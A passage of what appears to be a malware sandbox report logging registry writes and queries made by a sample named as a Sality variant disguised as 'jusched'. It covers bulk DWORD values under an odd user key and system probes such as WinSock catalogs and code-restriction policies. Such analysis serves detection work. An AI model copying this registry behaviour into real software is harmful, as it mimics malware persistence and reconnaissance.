4 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_289 Dword -1869040631 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_289 Dword -1852059064 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_290 Dword -512480189 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_290 Dword 118108018 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_290 Dword 101275089 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_290 Dword 118109072 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_291 Dword -2072283367 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_291 Dword 2088274937 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_291 Dword 2105275033 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_291 Dword 2088277208 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_292 Dword 413144951 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_292 Dword -236572005 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_292 Dword -253390751 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_292 Dword -236521952 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_293 Dword 1822035242 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_293 Dword 1733643102 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_293 Dword 1716924713 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_293 Dword 1733646184 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_294 Dword 1981934077 success or wait 1
4 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_294 Dword -591160132 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_294 Dword -574562575 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_294 Dword -591152976 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_295 Dword 1211088429 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_295 Dword 1379011342 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_295 Dword 1395752889 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_295 Dword 1379015160 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_296 Dword 2130719495 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_296 Dword -945787391 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_296 Dword -962388735 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_296 Dword -945784000 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_297 Dword 1003867792 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_297 Dword 1024379510 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_297 Dword 1007532745 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_297 Dword 1024384136 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_298 Dword 1914538061 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_298 Dword -1300420883 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_298 Dword -1283564655 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_298 Dword -1300415024 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_299 Dword 1730202203 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_299 Dword 669746954 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_299 Dword 652802393 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_299 Dword 669753112 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_300 Dword -1588898248 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_300 Dword -1655041327 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_300 Dword -1671862751 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_300 Dword -1655046048 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_301 Dword -547734045 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_301 Dword 315127565 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_301 Dword 332072937 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_301 Dword 315122088 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_302 Dword -1830212828 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_302 Dword -2009672672 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_302 Dword -1992973135 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_302 Dword -2009677072 success or wait 1
[ Registry keys Queried ]
Reputation Key Path Name Completion Count
14092 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server TSAppCompat success or wait 1
9674 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon LeakTrack object name not found 1
11572 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager SafeDllSearchMode object name not found 1
8022 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers TransparentEnabled success or wait 1
14816 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize DisableMetaFiles object name not found 1
6003 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows AppInit_DLLs success or wait 1
8416 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager CriticalSectionTimeout success or wait 1
5419 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole RWLockResourceTimeOut object name not found 1
8417 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface InterfaceHelperDisableAll object name not found 1
8402 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface InterfaceHelperDisableAllForOle32 object name not found 1
8402 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface InterfaceHelperDisableTypeLib object name not found 1
8400 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00020400-0000-0000-C000-000000000046} InterfaceHelperDisableAll object name not found 1
8398 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00020400-0000-0000-C000-000000000046} InterfaceHelperDisableAllForOle32 object name not found 1
8381 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Control Panel\Desktop SmoothScroll object name not found 1
4853 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced EnableBalloonTips object name not found 1
5116 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings DisableImprovedZoneCheck object name not found 1
4 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN jusched.win32_sality_NAO.exe object name not found 1
2595 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN * object name not found 1
19159 HKEY_LOCAL_MACHINE\SYSTEM\Setup SystemSetupInProgress success or wait 1
8381 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Control Panel\Desktop SmoothScroll object name not found 1
7012 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters WinSock_Registry_Version success or wait 1
7012 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters WinSock_Registry_Version success or wait 1
4341 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9 Serial_Access_Num success or wait 1
4341 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9 Serial_Access_Num success or wait 1
2127 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9 Next_Catalog_Entry_ID success or wait 1
2127 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9 Num_Catalog_Entries success or wait 1
4248 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001 PackedCatalogItem buffer overflow 2
2125 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001 PackedCatalogItem success or wait 1
4255 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002 PackedCatalogItem buffer overflow 2
2123 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002 PackedCatalogItem success or wait 1
4252 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003 PackedCatalogItem buffer overflow 2
2123 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003 PackedCatalogItem success or wait 1
4252 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004 PackedCatalogItem buffer overflow 2
2122 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004 PackedCatalogItem success or wait 1
4246 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005 PackedCatalogItem buffer overflow 2
2126 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005 PackedCatalogItem success or wait 1
4246 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006 PackedCatalogItem buffer overflow 2
2122 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006 PackedCatalogItem success or wait 1
4244 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007 PackedCatalogItem buffer overflow 2
2126 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007 PackedCatalogItem success or wait 1
4244 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008 PackedCatalogItem buffer overflow 2
2122 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008 PackedCatalogItem success or wait 1
712 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009 PackedCatalogItem buffer overflow 2
2123 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009 PackedCatalogItem success or wait 1
4244 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010 PackedCatalogItem buffer overflow 2
40 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010 PackedCatalogItem success or wait 1
4241 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011 PackedCatalogItem buffer overflow 2
2119 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011 PackedCatalogItem success or wait 1
4246 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000012 PackedCatalogItem buffer overflow 2
2119 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000012 PackedCatalogItem success or wait 1
4238 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013 PackedCatalogItem buffer overflow 2
2123 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013 PackedCatalogItem success or wait 1
4240 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5 Serial_Access_Num success or wait 1
4240 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5 Serial_Access_Num success or wait 1
2085 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5 Num_Catalog_Entries success or wait 1
4168 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 LibraryPath success or wait 1
4168 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 LibraryPath success or wait 1
9600 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 DisplayString success or wait 1
9600 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 DisplayString success or wait 1
9600 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 DisplayString success or wait 1
9600 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 DisplayString success or wait 1
2081 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 ProviderId success or wait 1
2080 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 AddressFamily object name not found 1
2080 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 SupportedNameSpace success or wait 1
2080 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 Enabled success or wait 1
2081 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 Version success or wait 1
2082 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 StoresServiceClassInfo success or wait 1
4152 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 LibraryPath success or wait 1
4152 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 LibraryPath success or wait 1
9558 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 DisplayString success or wait 1
9558 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 DisplayString success or wait 1
9558 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 DisplayString success or wait 1
9558 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 DisplayString success or wait 1
2079 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 ProviderId success or wait 1
2074 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 AddressFamily object name not found 1
2074 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 SupportedNameSpace success or wait 1
2074 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 Enabled success or wait 1
2074 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 Version success or wait 1
2074 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 StoresServiceClassInfo success or wait 1
4158 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 LibraryPath success or wait 1
4158 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 LibraryPath success or wait 1
9530 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 DisplayString success or wait 1
9530 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 DisplayString success or wait 1
9530 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 DisplayString success or wait 1
9530 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 DisplayString success or wait 1
2076 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 ProviderId success or wait 1
2073 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 AddressFamily object name not found 1
2072 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 SupportedNameSpace success or wait 1
2076 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 Enabled success or wait 1
2072 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 Version success or wait 1
2076 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 StoresServiceClassInfo success or wait 1
2025 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Ws2_32NumHandleBuckets object name not found 1
5628 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared CUAS success or wait 1
7498 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Keyboard Layout\Toggle Language Hotkey success or wait 1
7498 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Keyboard Layout\Toggle Language Hotkey success or wait 1
7494 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Keyboard Layout\Toggle Layout Hotkey success or wait 1
7494 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Keyboard Layout\Toggle Layout Hotkey success or wait 1
4288 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF EnableAnchorContext object name not found 1
13527 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName ComputerName success or wait 1
8 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_0 object name not found 1
6149 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc MaxRpcSize object name not found 1
13527 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName ComputerName success or wait 1
6 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_0 success or wait 1
6 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_0 success or wait 1
6 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_0 success or wait 1
6 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_0 success or wait 1
---- snip due to repetive entries----
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_302 success or wait 1
4 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_303 object name not found 1
13527 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName ComputerName success or wait 1
6323 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Hostname success or wait 1
5444 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Domain success or wait 1
2089 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\AppCompatibility DisableAppCompat object name not found 1
2423 HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter Installed success or wait 1
8022 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers TransparentEnabled success or wait 1
1691 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers AuthenticodeEnabled success or wait 1
1766 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers Levels object name not found 1
1763 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} ItemData success or wait 1
1768 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} SaferFlags success or wait 1
1763 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ItemData success or wait 1
1768 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} HashAlg success or wait 1
1763 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ItemSize success or wait 1
1764 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} SaferFlags success or wait 1
1768 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ItemData success or wait 1
1765 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} HashAlg success or wait 1
1763 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ItemSize success or wait 1
1764 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} SaferFlags success or wait 1
1762 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ItemData success or wait 1
1767 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} HashAlg success or wait 1
1764 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ItemSize success or wait 1
1764 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} SaferFlags success or wait 1
1763 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ItemData success or wait 1
1762 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} HashAlg success or wait 1
1762 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ItemSize success or wait 1
1762 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} SaferFlags success or wait 1
1762 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ItemData success or wait 1
1763 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} HashAlg success or wait 1
1764 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ItemSize success or wait 1
